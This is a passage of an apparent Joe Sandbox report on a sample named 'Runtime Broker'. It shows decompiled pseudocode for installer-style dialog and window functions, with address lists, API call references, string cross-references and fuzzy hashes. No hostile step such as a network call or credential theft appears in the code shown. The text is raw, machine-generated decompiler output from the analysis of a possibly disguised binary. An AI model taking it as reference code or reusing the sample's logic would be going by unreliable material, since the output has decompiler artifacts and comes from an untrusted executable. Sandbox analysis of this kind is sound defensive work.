										 *( *0x423740 + _t306 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t291 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v32 = 1;
									 *( *0x423740 + _t306 * 4) = _t291;
									_v16 =  *( *0x423740 + _t306 * 4);
								}
							}
							_t306 = _t306 + 1;
							_t324 =  &(_v28[0x818]);
							_v28 = _t324;
						} while (_t306 <  *0x42a2ac);
						if(_v32 != 0) {
							L20:
							if(_v20 != 0) {
								E004044C7(_v8);
								_t298 = _v36;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044C7(_v12);
								L93:
								return E004044F9(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404f1d
0x00404f23
0x00404f25
0x00404f2b
0x00404f31
0x00404f47
0x00404f4a
0x00404f4d
0x00405180
0x00405187
0x0040519b
0x00405189
0x0040518b
0x0040518e
0x0040518f
0x00405196
0x00405196
0x004051a7
0x004051b5
0x004051b8
0x004051ce
0x00405246
0x00405249
0x0040524b
0x00405255
0x00405263
0x00405263
0x00405265
0x0040526f
0x00405275
0x00405278
0x00405293
0x0040527a
0x00405284
0x00405284
0x00405278
0x0040526f
0x00000000
0x00405249
0x004051d3
0x004051de
0x004051e3
0x004051ea
0x004051f1
0x004051f4
0x004051fc
0x004051fc
0x00405200
0x00405204
0x00405208
0x0040521b
0x0040520a
0x0040520a
0x00405211
0x00405217
0x00405213
0x00405213
0x00405213
0x00405211
0x00405221
0x00405223
0x0040522b
0x00405233
0x00405243
0x00405243
0x00405204
0x00000000
0x004051f4
0x004051d5
0x004051dc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405296
0x00405296
0x0040529d
0x0040530e
0x00405315
0x00405321
0x00405321
0x0040532a
0x0040532c
0x00405333
0x00405336
0x00405336
0x0040533c
0x00405343
0x00405346
0x00405346
0x0040534c
0x00405352
0x00405358
0x00405358
0x00405365
0x004054c5
0x004054cc
0x004054e9
0x004054ef
0x00405501
0x00405501
0x00000000
0x0040536b
0x0040536d
0x00405372
0x00405377
0x0040537c
0x0040537e
0x0040537e
0x0040537f
0x00405380
0x00405382
0x00405382
0x0040538a
0x004053cb
0x004053cd
0x004053dd
0x004053e0
0x004053e5
0x004053ec
0x004053ef
0x00405491
0x00405499
0x004054a1
0x004054a1
0x004054af
0x004054c0
0x004054c0
0x00000000
0x004054af
0x004053f5
0x004053f8
0x004053fe
0x00405403
0x00405405
0x00405407
0x0040540d
0x00405414
0x00405419
0x00405420
0x00405423
0x00405423
0x0040542a
0x00405436
0x0040543a
0x0040543c
0x0040543c
0x0040542c
0x0040542e
0x0040542e
0x0040545c
0x00405468
0x00405477
0x00405477
0x00405479
0x0040547c
0x00405485
0x00000000
0x0040538c
0x00405397
0x0040539a
0x0040539f
0x004053a1
0x004053a5
0x004053b5
0x004053bf
0x004053c1
0x004053c4
0x00000000
0x00000000
0x00000000
0x00000000
0x004053a7
0x004053a7
0x004053ad
0x004053af
0x004053af
0x004053b0
0x004053b1
0x00000000
0x004053a7
0x0040538a
0x00405365
0x004052a5
0x00000000
0x004052bb
0x004052c5
0x004052ca
0x00000000
0x00000000
0x004052dc
0x004052e1
0x004052ed
0x004052ed
0x004052ef
0x004052fe
0x00405300
0x00405304
0x00405307
0x00000000
0x00405307
0x004052a5
0x00404f53
0x00404f58
0x00404f62
0x00404f63
0x00404f6c
0x00404f7b
0x00404f86
0x00404f8c
0x00404f9a
0x00404faf
0x00404fb4
0x00404fbf
0x00404fc8
0x00404fdd
0x00404fee
0x00404ffb
0x00404ffb
0x00405000
0x00405006
0x00405008
0x0040500b
0x00405010
0x00405015
0x00405017
0x00405017
0x00405037
0x00405037
0x00405039
0x0040503a
0x0040503f
0x00405045
0x00405049
0x0040504e
0x00405056
0x0040505a
0x0040505f
0x00405064
0x0040506c
0x0040506f
0x0040513f
0x00405152
0x00000000
0x00405075
0x00405078
0x0040507b
0x0040507e
0x0040507e
0x00405084
0x0040508d
0x00405090
0x00405094
0x00405097
0x0040509a
0x004050a3
0x004050ac
0x004050af
0x004050b2
0x004050b5
0x004050f3
0x0040511e
0x004050f5
0x00405104
0x00405104
0x004050b7
0x004050ba
0x004050c8
0x004050d2
0x004050da
0x004050e1
0x004050ec
0x004050ec
0x004050b5
0x00405124
0x00405125
0x00405131
0x00405131
0x0040513d
0x00405158
0x0040515b
0x00405178
0x0040517d
0x00000000
0x0040515d
0x00405162
0x0040516b
0x00405503
0x00405515
0x00405515
0x0040515b
0x00000000
0x0040513d
0x0040506f

APIs

GetDlgItem.USER32 ref: 00404F16
GetDlgItem.USER32 ref: 00404F23
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F6F
LoadImageW.USER32 ref: 00404F86
SetWindowLongW.USER32 ref: 00404FA0
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB4
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404FC8
SendMessageW.USER32(?,00001109,00000002), ref: 00404FDD
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FE9
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFB
DeleteObject.GDI32(00000110), ref: 00405000
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102

Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
GetWindowLongW.USER32(?,000000F0), ref: 00405144
SetWindowLongW.USER32 ref: 00405152
ShowWindow.USER32(?,00000005), ref: 00405162
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405263
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C5
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DA
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FE
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405321
ImageList_Destroy.COMCTL32(?), ref: 00405336
GlobalFree.KERNEL32 ref: 00405346
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053BF
SendMessageW.USER32(?,00001102,?,?), ref: 00405468
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405477
InvalidateRect.USER32(?,00000000,00000001), ref: 004054A1
ShowWindow.USER32(?,00000000), ref: 004054EF
GetDlgItem.USER32 ref: 004054FA
ShowWindow.USER32(00000000), ref: 00405501

Strings

N, xrefs: 0040519E
, xrefs: 004054D9
M, xrefs: 004050BA

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: a8bdb882960737aa5fa9f8fb9e921f3b8e835265e7d74f83b30dbe73f066f3dd
Instruction ID: 51cb895bf96748e94aa34dbd086816f234b0803d1cad36f3447be88a3ed44bf2
Opcode Fuzzy Hash: a8bdb882960737aa5fa9f8fb9e921f3b8e835265e7d74f83b30dbe73f066f3dd
Instruction Fuzzy Hash: 0C126970900609EFDF209FA5DC45AAE7BB5FB44314F10817AEA10BA2E1D7798A52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403FB9, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00403FB9(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t70;
				struct HWND__* _t76;
				signed int _t89;
				struct HWND__* _t94;
				signed int _t102;
				int _t106;
				signed int _t118;
				signed int _t119;
				int _t120;
				signed int _t125;
				struct HWND__* _t128;
				struct HWND__* _t129;
				int _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t118 = _a8;
				if(_t118 == 0x110 || _t118 == 0x408) {
					_t37 = _a12;
					_t128 = _a4;
					__eflags = _t118 - 0x110;
					 *0x423730 = _t37;
					if(_t118 == 0x110) {
						 *0x42a268 = _t128;
						 *0x423744 = GetDlgItem(_t128, 1);
						_t94 = GetDlgItem(_t128, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t94;
						E00404492(_t128);
						SetClassLongW(_t128, 0xfffffff2,  *0x429248);
						 *0x42922c = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t125 =  *0x40a39c; // 0xffffffff
					_t136 = 0;
					_t133 = (_t125 << 6) +  *0x42a2a0;
					__eflags = _t125;
					if(_t125 < 0) {
						L34:
						E004044DE(0x40b);
						while(1) {
							_t39 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t39;
							_t133 = _t133 + (_t39 << 6);
							_t41 =  *0x40a39c; // 0xffffffff
							__eflags = _t41 -  *0x42a2a4;
							if(_t41 ==  *0x42a2a4) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a2a4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t119 =  *(_t133 + 0x14);
							E00406579(_t119, _t128, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404492(_t128);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404492(_t128);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404492(_t128);
							_t51 = GetDlgItem(_t128, 3);
							__eflags =  *0x42a30c - _t136;
							_v32 = _t51;
							if( *0x42a30c != _t136) {
								_t119 = _t119 & 0x0000fefd | 0x00000004;
								__eflags = _t119;
							}
							ShowWindow(_t51, _t119 & 0x00000008);
							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100);
							E004044B4(_t119 & 0x00000002);
							_t120 = _t119 & 0x00000004;
							EnableWindow( *0x421710, _t120);
							__eflags = _t120 - _t136;
							if(_t120 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
							__eflags =  *0x42a30c - _t136;
							if( *0x42a30c == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t128, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004044C7();
							E0040653C(0x423748, E00403F9A());
							E00406579(0x423748, _t128, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t128, 0x423748);
							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
							__eflags = _t70;
							if(_t70 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L58;
									}
									_t76 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t128,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t76 - _t136;
									 *0x429238 = _t76;
									if(_t76 == _t136) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404492(_t76);
									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t128, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L61;
									}
									ShowWindow( *0x429238, 8);
									E004044DE(0x405);
									goto L58;
								}
								__eflags =  *0x42a30c - _t136;
								if( *0x42a30c != _t136) {
									goto L61;
								}
								__eflags =  *0x42a300 - _t136;
								if( *0x42a300 != _t136) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x429238);
						 *0x42a268 = _t136;
						EndDialog(_t128,  *0x421f18);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L61;
							}
							goto L34;
						}
						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
						__eflags = _t89;
						if(_t89 == 0) {
							goto L33;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t128 = _a4;
					_t136 = 0;
					if(_t118 == 0x47) {
						SetWindowPos( *0x423728, _t128, 0, 0, 0, 0, 0x13);
					}
					if(_t118 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_a12 - 1) & _t118);
					}
					if(_t118 != 0x40d) {
						__eflags = _t118 - 0x11;
						if(_t118 != 0x11) {
							__eflags = _t118 - 0x111;
							if(_t118 != 0x111) {
								L26:
								return E004044F9(_t118, _a12, _a16);
							}
							_t135 = _a12 & 0x0000ffff;
							_t129 = GetDlgItem(_t128, _t135);
							__eflags = _t129 - _t136;
							if(_t129 == _t136) {
								L13:
								__eflags = _t135 - 1;
								if(_t135 != 1) {
									__eflags = _t135 - 3;
									if(_t135 != 3) {
										_t130 = 2;
										__eflags = _t135 - _t130;
										if(_t135 != _t130) {
											L25:
											SendMessageW( *0x429238, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42a30c - _t136;
										if( *0x42a30c == _t136) {
											_t102 = E0040140B(3);
											__eflags = _t102;
											if(_t102 != 0) {
												goto L26;
											}
											 *0x421f18 = 1;
											L21:
											_push(0x78);
											L22:
											E0040446B();
											goto L26;
										}
										E0040140B(_t130);
										 *0x421f18 = _t130;
										goto L21;
									}
									__eflags =  *0x40a39c - _t136; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t135);
								goto L22;
							}
							SendMessageW(_t129, 0xf3, _t136, _t136);
							_t106 = IsWindowEnabled(_t129);
							__eflags = _t106;
							if(_t106 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t128, _t136, _t136);
						return 1;
					} else {
						DestroyWindow( *0x429238);
						 *0x429238 = _a12;
						L58:
						if( *0x425748 == _t136 &&  *0x429238 != _t136) {
							ShowWindow(_t128, 0xa);
							 *0x425748 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x00403fc2
0x00403fcb
0x0040410c
0x00404110
0x00404114
0x00404116
0x0040411b
0x00404126
0x00404131
0x00404136
0x00404138
0x0040413a
0x0040413d
0x00404142
0x00404150
0x0040415d
0x00404164
0x00404164
0x00404165
0x00404165
0x0040416a
0x00404170
0x00404177
0x0040417d
0x0040417f
0x004041bf
0x004041c4
0x004041c9
0x004041c9
0x004041ce
0x004041d7
0x004041d9
0x004041de
0x004041e4
0x004041e8
0x004041e8
0x004041ed
0x004041f3
0x00000000
0x00000000
0x004041fe
0x00404204
0x00000000
0x00000000
0x0040420d
0x00404215
0x0040421a
0x0040421d
0x00404223
0x00404228
0x0040422b
0x00404231
0x00404236
0x00404239
0x0040423f
0x00404247
0x0040424d
0x00404253
0x00404257
0x0040425e
0x0040425e
0x0040425e
0x00404268
0x0040427a
0x00404286
0x0040428b
0x00404295
0x0040429b
0x0040429d
0x004042a2
0x0040429f
0x0040429f
0x0040429f
0x004042b2
0x004042ca
0x004042cc
0x004042d2
0x004042e7
0x004042d4
0x004042dd
0x004042df
0x004042df
0x004042ed
0x004042fe
0x00404314
0x0040431b
0x00404325
0x0040432a
0x0040432c
0x00000000
0x00404332
0x00404332
0x00404334
0x00000000
0x00000000
0x0040433a
0x0040433e
0x00404363
0x00404369
0x0040436f
0x00404371
0x00000000
0x00000000
0x00404397
0x0040439d
0x0040439f
0x004043a4
0x00000000
0x00000000
0x004043aa
0x004043ad
0x004043b0
0x004043c7
0x004043d3
0x004043ec
0x004043f6
0x004043fb
0x00404401
0x00000000
0x00000000
0x0040440b
0x00404416
0x00000000
0x00404416
0x00404340
0x00404346
0x00000000
0x00000000
0x0040434c
0x00404352
0x00000000
0x00000000
0x00000000
0x00404358
0x0040432c
0x00404423
0x0040442f
0x00404436
0x00000000
0x00404181
0x00404181
0x00404184
0x004041b7
0x004041b7
0x004041b9
0x00000000
0x00000000
0x00000000
0x004041b9
0x0040418a
0x0040418f
0x00404191
0x00000000
0x00000000
0x004041a1
0x004041a9
0x00000000
0x004041af
0x00403fdd
0x00403fdd
0x00403fe1
0x00403fe6
0x00403ff5
0x00403ff5
0x00403ffe
0x00404007
0x00404012
0x00404012
0x0040401e
0x0040403a
0x0040403d
0x00404050
0x00404056
0x004040f9
0x00000000
0x00404102
0x0040405c
0x00404069
0x0040406b
0x0040406d
0x0040408c
0x0040408c
0x0040408f
0x00404094
0x00404097
0x004040a7
0x004040a8
0x004040aa
0x004040e0
0x004040f3
0x00000000
0x004040f3
0x004040ac
0x004040b2
0x004040cb
0x004040d0
0x004040d2
0x00000000
0x00000000
0x004040d4
0x004040c0
0x004040c0
0x004040c2
0x004040c2
0x00000000
0x004040c2
0x004040b5
0x004040ba
0x00000000
0x004040ba
0x00404099
0x0040409f
0x00000000
0x00000000
0x004040a1
0x00000000
0x004040a1
0x00404091
0x00000000
0x00404091
0x00404077
0x0040407e
0x00404084
0x00404086
0x00000000
0x00000000
0x00000000
0x00404086
0x00404042
0x00000000
0x00404020
0x00404026
0x00404030
0x0040443c
0x00404442
0x0040444f
0x00404455
0x00404455
0x0040445f
0x00000000
0x0040445f
0x0040401e

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FF5
ShowWindow.USER32(?), ref: 00404012
DestroyWindow.USER32 ref: 00404026
SetWindowLongW.USER32 ref: 00404042
GetDlgItem.USER32 ref: 00404063
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404077
IsWindowEnabled.USER32(00000000), ref: 0040407E
GetDlgItem.USER32 ref: 0040412C
GetDlgItem.USER32 ref: 00404136
SetClassLongW.USER32(?,000000F2,?), ref: 00404150
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A1
GetDlgItem.USER32 ref: 00404247
ShowWindow.USER32(00000000,?), ref: 00404268
EnableWindow.USER32(?,?), ref: 0040427A
EnableWindow.USER32(?,?), ref: 00404295
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042AB
EnableMenuItem.USER32 ref: 004042B2
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042CA
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042DD
lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404307
SetWindowTextW.USER32(?,00423748), ref: 0040431B
ShowWindow.USER32(?,0000000A), ref: 0040444F

Strings

H7B, xrefs: 004042F7

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: H7B
API String ID: 184305955-2300413410
Opcode ID: 7a4d7a2b6d88d2e979721611d93dcd82fba8a79b9e582fd56e137d420d9fb1a2
Instruction ID: 474293f91904d384e756f83d9200f154ec1a476d51ccc5c10f5d023ba508d08e
Opcode Fuzzy Hash: 7a4d7a2b6d88d2e979721611d93dcd82fba8a79b9e582fd56e137d420d9fb1a2
Instruction Fuzzy Hash: 17C1B1B1600604FBCB216F61EE85E2A7BB8EB84705F40497EF741B51F1CB3958529B2E

Uniqueness

Uniqueness Score: -1.00%

Function 00404651, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404651(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E004044F9(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404900(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004044B4(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048DC();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a2b8 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404602;
				if(_t110 != 2) {
					_v8 = E004045C8;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404492(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404492(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004044B4( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004044C7(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a274 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}

0x00404663
0x00404790
0x004047ed
0x004047f1
0x004048be
0x004048c0
0x004048c0
0x004048c6
0x004048c6
0x004048c9
0x00000000
0x004048d0
0x004047ff
0x00404805
0x0040480f
0x0040481a
0x0040481d
0x00404820
0x0040482b
0x0040482e
0x00404835
0x00404842
0x00404853
0x00404859
0x00404861
0x0040486f
0x00404875
0x00404875
0x00404835
0x0040487f
0x00000000
0x0040488a
0x0040488e
0x0040489e
0x0040489e
0x004048a4
0x004048b0
0x004048b0
0x00000000
0x004048b4
0x0040487f
0x0040479b
0x00000000
0x004047ad
0x004047b2
0x004047b8
0x00000000
0x00000000
0x004047e1
0x004047e3
0x004047e8
0x00000000
0x004047e8
0x0040479b
0x00404669
0x0040466c
0x00404671
0x00404682
0x00404682
0x0040468a
0x0040468d
0x00404691
0x00404694
0x00404698
0x0040469b
0x0040469e
0x004046a1
0x004046a8
0x004046aa
0x004046aa
0x004046b4
0x004046c1
0x004046cb
0x004046d0
0x004046d3
0x004046d8
0x004046ef
0x004046f6
0x00404709
0x0040470c
0x00404720
0x00404727
0x0040472c
0x00404731
0x00404731
0x0040473f
0x0040474d
0x0040475f
0x00404764
0x00404774
0x00404776
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046EF
GetDlgItem.USER32 ref: 00404703
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404720
GetSysColor.USER32(?), ref: 00404731
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040473F
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040474D
lstrlenW.KERNEL32(?), ref: 00404752
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040475F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404774
GetDlgItem.USER32 ref: 004047CD
SendMessageW.USER32(00000000), ref: 004047D4
GetDlgItem.USER32 ref: 004047FF
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404842
LoadCursorW.USER32(00000000,00007F02), ref: 00404850
SetCursor.USER32(00000000), ref: 00404853
LoadCursorW.USER32(00000000,00007F00), ref: 0040486C
SetCursor.USER32(00000000), ref: 0040486F
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040489E
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B0

Strings

N, xrefs: 004047ED
markers.py, xrefs: 0040482E

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N$markers.py
API String ID: 3103080414-177419185
Opcode ID: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
Instruction ID: 9740ae806e86bdd9a5d1823962a5ed5927fd13c96e858ba55e5d087808badbab
Opcode Fuzzy Hash: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
Instruction Fuzzy Hash: EE6193B1900209FFDB10AF60DD85E6A7B69FB84314F00853AFA05B62D1D7789D51CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00406188, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406188(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
